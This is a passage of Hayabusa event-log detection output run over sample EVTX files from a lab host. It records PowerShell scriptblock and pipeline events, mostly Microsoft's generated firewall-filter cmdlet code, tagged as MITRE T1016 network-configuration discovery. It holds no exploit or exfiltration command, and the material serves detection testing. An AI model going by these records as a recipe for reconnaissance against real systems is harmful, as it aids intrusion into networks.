.EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallServiceFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 